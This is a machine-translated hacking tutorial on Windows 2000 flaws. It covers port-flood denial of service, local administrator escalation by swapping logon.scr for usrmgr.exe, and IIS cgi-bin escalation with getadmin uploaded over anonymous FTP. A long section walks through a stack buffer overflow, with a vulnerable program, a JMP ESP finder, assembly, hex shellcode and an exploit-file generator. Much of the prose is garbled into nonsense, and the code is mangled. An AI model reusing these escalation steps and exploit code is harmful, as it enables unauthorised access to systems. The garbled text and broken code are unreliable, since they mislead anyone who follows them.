Windows 2000 Loopholes explained

In the Windows 2000 server cpu overload

A series of binary 0 sending the characters reach an arbitrary port Windows 2000, may cause CPU utilization to reach 100%. TCP ports, including the Port of this issue for 7,9,21,23,7778 UDP port and port No. 53,67,68,135,500,1812,1813,2535,3456 these.
DOS in Windows 2000 server operating system loopholes
As a platform to Windows 2000 servers as a remote control console for remote access. As a long-range attack to the server made a series of offensive code, server failure. Here, if the system to automatically restart after work, many of the attacks resulted in the re-launching of long-range server constantly, until the reopening of the frequency of the system beyond the capacity of system to collapse.

Also :
1.
If you are a regular user account, there is a very simple way to obtain NT Administrator account :

The first c:\winnt\system32 logon.scr renamed logon.old Backup

Usrmgr.exe then renamed logon.scr

Then restart

Logon.scr to start the loading process is re-started after no previous landing password input interface, but users Manager

Then he added Administrator group have their own authority

Do not forget the document name names!

2.
Now the attention NT network security technologies applicable to the website.

Synopsis also some technical reference for the more senior officers

Probe access to the Internet can take the following steps :

NT IIS server because of the generally allow anonymous ftp access to the anonymous account, the account also upload some anonymous authority, we will attack these sites. If not allow anonymous accounts, it could lead to express passwords in transmission. Tcpspy intercepted these tools can be used passwords. Will talk about those more advanced technology.



It is precisely because of the creation of the landing permit anonymous ftp account, but also gives us the opportunity to break the NT server. We use ftp landing a NT server, for example : xxx.xxx.xxx.xxx (examples) :

Ftp xxx.xxx.xxx.xxx

Connected to xxx.xxx.xxx.xxx

220 2000svr Microsoft FTP Service (Version 5.0).

2000svr exposed its NETbios this thing, and then IIS in the background, the user will have a IUSER_2000svr account, belonging Domain user group, the Administrator account, we used to obtain the authority to the future

User (xxx.xxx.xxx.xxx none)) : anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password : guest or imported guest
For lack of knowledge of network security manager, a lot of people will not prohibit guest accounts, or no password. Then a guest account is available to the correct account number of users, although only Domain guest group

In such cases we can use the NT server's ftp.

Now, start identifying cgi-bin catalog (or scripts catalogs), and when he went,

Winnt regard to the cmd.execopy cgi-bin, getadmin and passed up to cgi-bin gasys.dll

Http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN input :

Less than 20 seconds later the screen shows :

CGI Error

90% of the time you had IUSER_2000svr may be upgraded to : Administrator, any person who is to visit the web station manager

Introduction to Windows 2000 Buffer Overflow

On the Internet I read many articles on the buffer overflow. *NIX The majority of whom were based on the operating system platform. Ipxodi honor later editions of the book "The Stack Overflow in Windows System" (Green Alliance network security magazine published in the third 2000? Invest in schools fail to accompany confrontation blowing up 薐 ason President Joseph agitate the "Buffer Overflow in Windows NT 's From Start to Finish>. benefited immensely. Jason translation of the article, I installed Windows 2000 Server machine, the original testing procedures found in the details due to rounding. This paper provided by the Program, DLL, Offset other machines on my own debugging later. (different versions of the DLL, who have their own testing program. )

This article should be an entry-level. While relatively simple, but for the Buffer Overflow in Windows System with a certain overall. For example, the address to determine stack overflow, goto instructions identify and use overflow code enforcement in the preparation, and so on. As long as Windows systems found loopholes in the procedures under the buffer overflow, basically through these steps can attack tests. However, as pointed out by ipxodi, updated version of Windows DLL fast, it must be based on the actual programming platform for debugging.



Microsoft Visual C + + 6.0
Microsoft Windows 2000 Server (Chinese version, the internal version number : 2195)

Of [debugging and testing process

First, write a buffer overflow loopholes in the application. The program can read the content of the document, so we will be able to read the contents of the documents were revised to make them overflow. ;) In Visual C + + development environment to create a new console application, choosing "An Application that supports MFC" and clicking on the words "Finish." (Note : not necessarily a non-MFC applications is not only my own habit of it. ;))) Application of this procedure to add the necessary code, as follows :

CWinApp theApp;

Using namespace std;

Void overflow (char* buff);

Void overflow (char* buff)
{
CFile file;
CFileException er;
If (!file.Open (_T ( "overflow.txt"), CFile : : modeRead, &er))
{
Er.ReportError ();
Return;
}

Int x = file.GetLength ();
File.Read (buff, x);
}

Int _tmain (int argc, TCHAR* argv[], TCHAR* envp[])
{
Int nRetCode = 0

4003rd initialize MFC and print and error on failure
If (!AfxWinInit (: : GetModuleHandle (NULL), NULL, : : GetCommandLine (), 0))
{
4003rd TODO : change error code to suit your needs
Cerr "" _T ( "Fatal Error : MFC initialization failed"), "" endl;
NRetCode = 1;
}
Else
{
Char buff[10];
Overflow (buff);
}
Return nRetCode;
}

Now to analyze the above paragraph C + + code, look for where there are loopholes. This is a MFC Console application, "main" and other procedural functions will be slightly different, but basically the same mechanism. We analyzed the function of the "else" part of code. First, the words "char buff[10]", the local definition of a variable 10 characters long. We all know that the local variable stack Lane in the allocation of memory space. (Even if you do not know this, it is proposed that they would continue to read. :)) And then buff variable as a parameter to the number of call overflow letter. Well, our analysis overflow function. Cfile first is a target, then a CfileException targets. Next time will attempt to break the current authority of the paper catalog "overflow.txt." If the open is successful, all this paper? Chen Di lonesome "絙 uff array variables. Discovered a problem? Buff variables only 10 characters long. If the length of the 100 reading in the paper what will happen? To a "buffer overflow"! It is a stack buffer overflow occur. We will be able to see behind the tests, taking advantage of this loophole, we can do anything! ; ) Let us now create text documents "overflow.txt", a project it into the application catalog.

During the next step, let us consider what Windows NT/2000 on the memory structure. NT/2000 start of a process in the distribution of 4GB (0xFFFFFFFF) of virtual memory. The fact that some parts of the process is shared by all, such as the core device driver region. But they will be mapped to each process? Bin badger Mediterranean Housing accounted Hsi-20 and J-guided Xiamen macrophages play a steady salary Tan Zhi Lai ?GB physical memory, but only when necessary for the protection of physical memory allocation. Each process has its own 4GB virtual memory, the address range from 0x00000000 to 0xFFFFFFFF. Among them, 0x00000000-0x0000FFFF? alley wretched Differences target allocation reservations. Memory visit to the region will lead to "illegal visit" wrong. 0x00010000-0x7FFEFFFF user process space. EXE documents kept by loading them (the initial address 0x00400000), DLL (Dynamic Link Library) have been loaded into this? In view of the pig cabbage or DOS code LL H venture event in the area was packed to certain addresses, it can be implemented. No-packed visit to the region will lead to the address "illegal visit" wrong. 0x7FFF0000-0x7FFFFFFF is reserved area, this region will lead to any visits? Amine - long dream owed Austrian province Pui stockade toad ?x80000000-0xFFFFFFFF are for the use of operating systems. Driver and other equipment for loading core-level code. From the user-level applications (ring 3) visited this region will lead to "illegal visit" wrong.

Now return to the "overflow.txt" document. We will continue to add characters in the text file, the illegal application of the ejection system until the dialog box. Here, filling what is a very important character (you will know why). I have chosen lowercase letters "a"? GENERAL seeking gill profoundly uneasy Book Visit to learn center where the N and further credit begins to shake organic tissues play characters long, then filled first 11 characters. (Note : Killing way to compile program, the result may be different. ) What's this? No response. We continue to fill until filled characters : : 18 characters application procedures before the collapse. However, this would not be much of the usefulness of our collapse. Continue filling! When the string of length 24, the operating procedures and to observe the ejection of Dialog Information : "" 0x61616161 "commands invoke the" 0x61616161 "memory. The memory can not be "written." "I? Visit Krypton bark Ye Ω bridge Fed ?x61 "represent what is right despite the ASCII ) If you install the machines Visual C + +, single-hit "cancel" button will be able to use the debugging process. enter debugging environment, choose "view" menu -- "Killing Window" -- "registers" register windows can be opened. If you know nothing about the compilation. Hall first proposed rule net indistinct cheap pure Ne served basis thumb ugly woman and stealing the identity of T Ao eh Nuo Fair Winds heavy rope AX, EBS and other EIP register contents. EIP is the most important of course. EIP is the way? RENMINBI arbitrary arrest of a minimum income to further destroy the rural male Mediterranean ports will onions N Rhythm pro-Two doctors predict heavy rope SP register is not worth the damage And it seems not far away from us in the buff variables. We need to find out the next step is how to deal with the value of the ESP.

Now be a more complicated (and this is the source of fun! :)). The last line of code in the main function to install a breakpoint, because we care only about what happened here. Will start debugger, and failure-free operation of the agent breakpoint. Then switched to the anti-compilation window (Alt+8 or clicking on the words "View" - "Killing Window" -- "disassembly"). Furthermore, we need to open the window and register memory window.

0040155B 5F pop Sa'edi
0040155C 5E pop Česić
5B pop ebx 0040155D
0040155E 83 C4 50 add esp,50h
00401561 3B EC cmp ebp, opposition to the regime
E8 7E 00 00 00 00401563 call _chkesp (004015e6)
00401568 8B E5 Romov opposition to the regime, ebp
0040156A 5D pop ebp
0040156B ret C3



All these things? Compiled code. If you do not understand something that you have to compile Here, I do some simple explanation. The first line is "pop Sa'edi." Stack used to pop the top of the order after the designated register data were subsequently transferred. ESP register is needed attention. ESP is a stack of 32 indicators. A pop to the top of a stack instructions mobile data modules here DWORD (double word, 4 bytes), to mean? Been working thumb ugly woman soybean and Lau Yen restore school assembly just persist? (For a total of four mobile bytes). In the implementation of the next stage, let us look at the ESP register. Input window in memory ESP, we will be able to be present at the address and the contents of ESP. ESP see at the 4 bytes of memory addresses and the contents of the register EDI. Will one-step implementation of the "pop.edi", we have entered the ESP register EDI will be able to see what the numerical address at the memory, while also increasing the numerical ESP 4. Is the same as that behind the two directives, but register vary. They single-step implementation. The three rows of paper with instructions no meaning, and therefore does not explain here. Single-step instructions to "Romov opposition to the regime, ebp", the value of the directive will EBP exercises ESP register. Followed orders "pop ebp" This order is very important. Let us ESP input window in memory, we can see that there are a bunch of addresses "0x61" ( 'a', 16-ary value). So 0x61616161 which will be activated to the EBP register. Single-step instructions to implement the testing I can say right? ; ) Well, I say enough, but it seems we have not been able to get anything useful? Now that the final directive "ret." Orders "ret" in the Compendium is to return. It is how it should be returned to where? At the top of the stack from the current numerical decision. If this directive, said the pop instructions can be expressed as "pop eip" (even though you can not pop the implementation of this Directive; )). It addresses Department activated from the ESP is aimed 4 byte memory, and to empower EIP register (EIP register is a 32-bit instructions guide). This means that no matter which memory address at the EIP, which addresses the instructions? Well, much of indiscriminate aerial  uphold the arrest of two of the stand Inspector N Rhythm burglary ornamental cap toward Wa Ao posthumously sometimes lie flatter SP among the meteorites, to look at the exercises EIP register addresses what is the direction. In fact, I think everyone should know that time is four bytes of 0x61 series. Let us single-step implementation of the Directive, see the value of EIP 0 x61616161, is the next order to address 0x61616161, but directed shows for a bargain (which is meant to be invalid instructions). Single-step instructions for further action will cause "illegal visit" wrong. Now look at the ESP register. It rightly pointed at a stack of numerical. Also? Coke lowered prized worried doubled to further chaos teasing enough to shake the actual conditions returned overseas Chinese Fan Kao pointed out that the transition IP=0x61616161 绯 steady drying σ), ESP whether the address at which we can store the overflow code! We overflow.txt paper increased again four 'a' (a total of 28 'a'), and once again testing procedures, the implementation of the "ret" directed at the observation window and register memory window, we will find the implementation of the "ret" directive by ESP memory address at the 4 bytes of 0x61 series. Great! What does that mean? ! We all want to give the bar. ; )))

Now I come back to analysis. We used the characters' a '(0x61) as a text file filled with the contents to determine the buffer overflow. As EIP=0x61616161, when we tried to visit the address of the procedure to visit the directions, instructions and systems will be ineffective because of a mistake. However, if there is executable code at the address again? For example, to load a DLL memory codes. Haha, so will the implementation of these directives, which could not imagine that the others do something! ; )

Well, so far, we have numerical control EIP also know that ESP location at the stack and able to arbitrary data into the stack. So what to do next? We find the system is the implementation of a code of the overflow. If you read an article written by ipxodi "under the Windows system stack overflow," they will know that using goto Directive (jmp opposition to the regime) is the best and simple. Why not here anymore, please read carefully "the Stack Overflow in Windows System" will be clear. As in the previous analysis, it is precisely because of the implementation of ESP End ret directive to the overflow at our code! (: : Oh, we do not find that I have not analyzed? In this paper, find the word "Great" bar, huh, huh. ) Now in the application program memory space, we will find the words "jmp opposition to the regime" commands address. The first is a set of instructions and machine. How determined? This should teach? Well, teaching suggestions and bars. Only this time, not under illegal. ; ) Actually very simple, according to the following steps will be good enough. Visual C + +, first in the creation of new applications. (Of course, Console, or MFC support, it is my habit. Ha ha. ) Importation of the following codes :

CWinApp theApp;

Using namespace std;

Int _tmain (int argc, TCHAR* argv[], TCHAR* envp[])
{
Int nRetCode = 0

4003rd initialize MFC and print and error on failure
If (!AfxWinInit (: : GetModuleHandle (NULL), NULL, : : GetCommandLine (), 0))
{
4003rd TODO : change error code to suit your needs
Cerr "" _T ( "Fatal Error : MFC initialization failed"), "" endl;
NRetCode = 1;
}
Else
{
Return 0
__asm Jmp opposition to the regime
}
Return nRetCode;
}

Well, then set up the right environment in Visual C + + debugging breakpoint. ? For a "return 0" Department. Then operating procedure, it suspended operations in breakpoint Department. Now (choose "view" menu -- "Debug Windows" -- "Disassembly") opened the window anti-Series, and mouse anti-compilation window Shoot Right Key, Right Key activated in the menu choice "Source Annotation" and "Code Bytes." Meanwhile, at the address listed right there, (jmp opposition to the regime) directive left out "FF E4" is a direction "jmp opposition to the regime" and machine. If we need to identify other compilation instructions and machine basically been achieved through this method.

The next step in the process is how to find space for this series and machine. Is a very simple, as long as code can be changed a bit :

CWinApp theApp;

Using namespace std;

Int _tmain (int argc, TCHAR* argv[], TCHAR* envp[])
{
Int nRetCode = 0

4003rd initialize MFC and print and error on failure
If (!AfxWinInit (: : GetModuleHandle (NULL), NULL, : : GetCommandLine (), 0))
{
4003rd TODO : change error code to suit your needs
Cerr "" _T ( "Fatal Error : MFC initialization failed"), "" endl;
NRetCode = 1;
}
Else
{
#if 0
Return 0
__asm Jmp opposition to the regime

#else

Bool = false; we_loaded_it
HINSTANCE h;
TCHAR dllname[] = _T ( "User32");

H = GetModuleHandle (dllname);
If (h ====== NULL)
{
H = LoadLibrary (dllname);
If (h ====== NULL)
{
Cout<< "ERROR LOADING DLL :" "return 1; } We_loaded_it = true; } BYTE* ptr = (BYTE*) h; Bool done = false; For (int y = 0;!done;y++) { Try { If (0xFF, named ptr[y+1] ptr[y] ====== ====== 0xE4) { Int poses = (int) ptr + Rules Cout<< "OPCODE found at x," ") } Catch (. . . ) { Cout<< "innocent OF" "done = true; } } If (we_loaded_it) FreeLibrary (h); #endif } Return nRetCode; } You may wonder why we did not Kernel32.dll? It is not even whole? I said at the beginning of Kernel32 DLL is in the process of finding space "FF E4", but could not find a surprise! (In Windows NT 4 can be found in at least six! : (() In User32.dll Later, I tried to find, he finally found one. Operating procedures for export : OPCODE found at 0x77e2e32a Memory REACHED residents OF User32 Attention, and the DLL version, the results may not be the same. I DLL User32.dll version 5.00.2180.1. Editor band now used by 16 (Ultra Edit) opened overflow.txt text document, in paragraph 21 77 E2 E3 2A characters began to import location. (Why should the location of 21 characters? Why should I explain 77? imported 2A E2 E3, even if you have not read this, I suggest you not study the buffer overflow! ) Behind us to retain the four 'a' characters. Use debugger operating procedures, the implementation of the "ret" order came to a halt, the next instruction is to look at the "jmp opposition to the regime", but the implementation of the "jmp opposition to the regime" whether the contents of the former opposition to the regime of 0x61616161. All right, OK, so far so good. ; ) Allow us to prepare for more exciting events - the implementation of a code of buffer overflow. First of all, you must ensure that all needs were DLL loading process space. Calling the process itself is a way to use the DLL; Another way is to overflow in the dynamic link library code loading. (Ipxodi the "stack overflow in the Windows System? Xing Xing Qiang Han-sub attached Selling portrayed solely # Call begin restoring the site also brag sure Mei Law + N smoking yet seen the CD equivalent piece turned vermiculite accelerate # introduced ?P>; Oh, for a simple program, the main purpose of this paper is to teaching, with emphasis on theory, So code enforcement is only one news outlet box. If more attacks or preparing to implement the code more complex, the book can be found ipxodi "under the Windows system stack overflow"? Turpan lying russia Miao reportedly encouraged weed  steep prices for chicken pox giant Kao Ho, the Secretary for Operations cockroach 绯 also wants to match willing Two two sea ?P>; We have to find ways in which code Calling Messagebox. Under Windows API file, Messagebox dependent on user32.lib, it is located in user32.dll dynamic link library. start depends tool Overflow will be opened by the application, it can be found loading user32.dll. Messagebox then find the memory location. I machinery user32.dll. MessageBoxA (ASCII version), the shift function (Entry Point) for the initial address in memory 0x00033D68.User32.dll 0x77DF0000. can be combined to be the absolute memory address 0x77E23D68 Messagebox. So we need to set up correctly in the compilation of code and call 0x77E23D68 Stack. Gen? Di Xu teve Fewer winamp buffer overflow code of study and research, I write assembly code is as follows :

Push ebp
Push ecx
Romov ebp, opposition to the regime
Sub esp,54h
Xor ecx, ecx
Romov byte ptr [ebp-14h], 'S'
Romov byte ptr [ebp-13h] 'u'
Romov byte ptr [ebp-12h] 'c'
Romov byte ptr [ebp-11h] 'c'
Romov byte ptr [ebp-10h] 'e'
Romov byte ptr [ebp-0Fh] 's'
Romov byte ptr [ebp-0Eh] 's'
Romov byte ptr [ebp-0Dh], cl
Romov byte ptr [ebp-0Ch] 'W'
Romov byte ptr [ebp-0Bh] 'e'
Romov byte ptr [ebp-0Ah], ''
Romov byte ptr [ebp-9], 'G'
Romov byte ptr [ebp-8] 'o'
Romov byte ptr [ebp-7] 't'
Romov byte ptr [ebp-6], ''
Romov byte ptr [ebp-5], 'I'
Romov byte ptr [ebp-4] 't'
Romov byte ptr [ebp-3] '! '
Romov byte ptr [ebp-2], cl
Push ecx
Lea eax, [ebp-14h]
Push eax
Lea eax, [ebp-0Ch]
Push eax
Push ecx
Romov dword ptr [ebp-18h],0x 77E23D68
Call dword ptr[ebp-18h]
Romov opposition to the regime, ebp
Pop ecx
Pop ebp

0x77E23D68 compiled code above will be deployed in the Messagebox that it activated entitled "Success" and the news as "We Got It!" news box. Must pay attention to is that we can not use 0 (NULL) as a string of characters written by ipxodi solutions please refer to the "stack overflow in the Windows System" and the Green Corps, finishing the "senior Buffer Overflow". Now, we want it? Screen control, it does not contribute indistinct worried workforce thigh guards Without amusement center Zone 7 Law characters try to hire cheekbone playing boom in Geneva diphenyliodonium foundation Miao Mei W curse Thrill  down screen product and buttocks shoulder blade yuan ?P>; \x55\x51\x8b\xec\x83\xec\x54\x33\xc9\xc6\x45\xec\x53\xc6\x45\xed\x75\xc6\x45
\xee\x63\xc6\x45\xef\x63\xc6\x45\xf0\x65\xc6\x45\xf1\x73\xc6\x45\xf2\x73\x88\x4d
\xf3\xc6\x45\xf4\x57\xc6\x45\xf5\x65\xc6\x45\xf6\x20\xc6\x45\xf7\x47\xc6\x45\xf8
\x6f\xc6\x45\xf9\x74\xc6\x45\xfa\x20\xc6\x45\xfb\x49\xc6\x45\xfc\x74\xc6\x45\xfd
\x21\x88\x4d\xfe\x51\x8d\x45\xec\x50\x8d\x45\xf4\x50\x51\xc7\x45\xe8\x68\x3d
\xe2\x77\xff\x55\xe8\x8b\xe5\x59\x5d

If these documents imported into overflow.txt, will be able to successfully overflow, and we customized news outlet box. When clicking on the words "identify" button, the application process will collapse. To avoid such a situation, we need to call the exit function to normal procedures. Wi Windows API file inspection, we can see that need into msvcrt.lib, certainly in msvcrt.dll dynamic link library. Use depends tools will find application rather than loading the msvcrtd.dll msvcrt.dll, it is because we now use the application debugging version. But both? Nevermind Lau whine  svcrtd.dll farm in the 1988 campaign, the start address 0x10200000, the shift function exit (Entry Point) 0x0000AF90, the absolute address 0x1020AF90 exit function. It compiled code :

Push ebp
Push ecx
Romov ebp, opposition to the regime
Sub esp,10h
Xor ecx, ecx
Push ecx
Romov dword ptr [ebp-4],0x1020AF90
Call dword ptr[ebp-4]
Romov opposition to the regime, ebp
Pop ecx
Pop ebp

0 exit code to call for the above function parameters, so that application code 0 to withdraw from the operation. After finishing the codes of the following :

\x55\x51\x8b\xec\x83\xec\x10\x33\xc9\x51\xc7\x45\xfc\x90\xaf\x20\x10\xff\x55\xfc\x8b\xe5\x59\x5d

Overflow.txt now above two strings and machine input to the document (to the starting position for the first 25 bytes. If this does not need to also understand why the farm, in front of the complex from about! )

If you find it troublesome, may use the following procedure (how kind, a good friend of the bars might be)) :

CWinApp theApp;

Using namespace std;

Int _tmain (int argc, TCHAR* argv[], TCHAR* envp[])
{
Int nRetCode = 0

4003rd initialize MFC and print and error on failure
If (!AfxWinInit (: : GetModuleHandle (NULL), NULL, : : GetCommandLine (), 0))
{
Cerr "" _T ( "Fatal Error : MFC initialization failed"), "" endl;
NRetCode = 1;
}
Else
{
Char buffer[20];
//0x77e2e32a //user32.dll JMP ESP
Eip[] char = "\x2a\xe3\xe2\x77";
Sploit[] char = "\x55\x51\x8b\xec\x83\xec\x54\x33\xc9\xc6\x45\xec\x53\xc6\x45\xed\x75\xc6\x45\xee"
"\x63\xc6\x45\xef\x63\xc6\x45\xf0\x65\xc6\x45\xf1\x73\xc6\x45\xf2\x73\x88\x4d\xf3\xc6"
"\x45\xf4\x57\xc6\x45\xf5\x65\xc6\x45\xf6\x20\xc6\x45\xf7\x47\xc6\x45\xf8\x6f\xc6\x45"
"\xf9\x74\xc6\x45\xfa\x20\xc6\x45\xfb\x49\xc6\x45\xfc\x74\xc6\x45\xfd\x21\x88\x4d\xfe"
"\x51\x8d\x45\xec\x50\x8d\x45\xf4\x50\x51\xc7\x45\xe8\x68\x3d\xe2\x77\xff\x55\xe8\x8b"
"\xe5\x59\x5d\x55\x51\x8b\xec\x83\xec\x10\x33\xc9\x51\xc7\x45\xfc\x90\xaf\x20\x10\xff"
"\x55\xfc\x8b\xe5\x59\x5d";

For (int x=0;x<20;x++)
{
Buffer[x] = 0x90;
}

CFile file;
File.Open ( "overflow.txt" CFile modeCreate | CFile : : : : modeWrite);

File.Write (buffer,20);
File.Write (eip, strlen (eip));
File.Write (sploit, strlen (sploit));

File.Close ();
}

Return nRetCode;
}

In the content and location to ensure that all documents are accurate, operating procedures were Overflow : : : : haha, we activated to frame the news! ! ! Shoot "set" button and the normal procedures for closing! ! !